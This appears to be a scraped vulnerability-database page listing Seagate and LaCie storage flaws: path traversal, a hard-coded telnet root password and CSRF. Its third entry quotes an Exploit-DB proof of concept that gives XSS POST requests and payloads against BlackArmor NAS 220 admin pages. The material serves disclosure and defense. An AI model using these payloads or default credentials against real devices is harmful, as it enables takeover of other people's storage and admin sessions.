"id": "CVE-2015-2875"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Absolute path traversal vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to read arbitrary files via a full pathname in a download request during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2875"
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "VULHUB",
"id": "VHN-80836"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#903500",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2015-2875",
"trust": 2.9
},
{
"db": "JVN",
"id": "JVNVU92833570",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208",
"trust": 0.7
},
{
"db": "BID",
"id": "76547",
"trust": 0.3
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-80836",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80836"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"id": "VAR-201512-0525",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULHUB",
"id": "VHN-80836"
}
],
"trust": 0.02
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "storage device",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-04-13T19:46:32.152000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware Updates for Seagate Products",
"trust": 0.8,
"url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
},
{
"title": "Multiple Seagate Fixes for wireless storage product path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57745"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
},
{
"problemtype": "CWE-Other",
"trust": 0.8
},
{
"problemtype": "CWE-255",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80836"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.kb.cert.org/vuls/id/903500"
},
{
"trust": 2.5,
"url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
},
{
"trust": 1.9,
"url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
},
{
"trust": 1.4,
"url": "https://apps1.seagate.com/downloads/request.html"
},
{
"trust": 1.4,
"url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/425.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu92833570/index.html"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
},
{
"trust": 0.3,
"url": "http://www.seagate.com/in/en/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80836"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80836"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-01T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80836"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
{
"date": "2015-12-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2015-09-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"date": "2015-12-31T05:59:03.720000",
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-12-08T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80836"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
{
"date": "2016-01-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2016-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-208"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-2875"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-208"
}
],
"trust": 0.6
}
}
VAR-201401-0160
Vulnerability from variot - Updated: 2025-04-11 22:48Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 2.4,
"vendor": "seagate",
"version": "sg2000-2000.1331"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "st320005lsa10g-rk"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "st340005lsa10g-rk"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "stav6000100"
},
{
"model": "technology llc blackarmor nas sg2000-2000.1331",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "220"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:seagate:blackarmor_nas_220",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jeroen - IT Nerdbox",
"sources": [
{
"db": "BID",
"id": "64655"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6922",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2013-6922",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2014-00096",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-66924",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6922",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-6922",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-00096",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-406",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-66924",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "VULHUB",
"id": "VHN-66924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6922"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "VULHUB",
"id": "VHN-66924"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-66924",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66924"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6922",
"trust": 3.4
},
{
"db": "SECUNIA",
"id": "56047",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "30726",
"trust": 2.3
},
{
"db": "BID",
"id": "64655",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00096",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-84093",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-61289",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124686",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66924",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "VULHUB",
"id": "VHN-66924"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"id": "VAR-201401-0160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "VULHUB",
"id": "VHN-66924"
}
],
"trust": 1.54343433
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
}
]
},
"last_update_date": "2025-04-11T22:48:24.365000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "BlackArmor NAS 220",
"trust": 0.8,
"url": "http://www.seagate.com/jp/ja/external-hard-drives/network-storage/business/blackarmor-nas-220/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://secunia.com/advisories/56047"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30726"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6922"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6922"
},
{
"trust": 0.6,
"url": "http://www.exploit-db.com/exploits/30726/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "VULHUB",
"id": "VHN-66924"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"db": "VULHUB",
"id": "VHN-66924"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"date": "2014-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-66924"
},
{
"date": "2014-01-06T00:00:00",
"db": "BID",
"id": "64655"
},
{
"date": "2014-01-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"date": "2014-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"date": "2014-01-21T16:06:19.763000",
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00096"
},
{
"date": "2014-01-22T00:00:00",
"db": "VULHUB",
"id": "VHN-66924"
},
{
"date": "2015-03-19T09:05:00",
"db": "BID",
"id": "64655"
},
{
"date": "2014-01-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005885"
},
{
"date": "2014-03-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-406"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-6922"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS 220 Device firmware cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005885"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-406"
}
],
"trust": 0.6
}
}
VAR-201401-0161
Vulnerability from variot - Updated: 2025-04-11 22:48Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the 'fullname' parameter and the admin/network_workgroup_domain.php script not properly filtering the 'workname' parameter . # Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities
Google Dork: N/A
Date: 04-01-2014
Exploit Author: Jeroen - IT Nerdbox
Vendor Homepage: http://www.seagate.com/ http://www.seagate.com/
Software Link:
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
Version: sg2000-2000.1331
Tested on: N/A
CVE : CVE-2013-6923
Description:
When adding a user to the device, it is possible to enter a full name.
This input field does not
sanitize its input and it is possible to enter any payload which will get
executed upon reload. The Work Group name input
field does not sanitize its input.
This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed.
Proof of Concept #1:
POST: http(s):///admin/access_control_user_edit.php?id=2&lang=en
Parameters:
index = 2
fullname = alert(1);
submit = Submit
Proof of Concept #2:
POST: http(s)://<url |
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
Parameter:
workname = ">
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
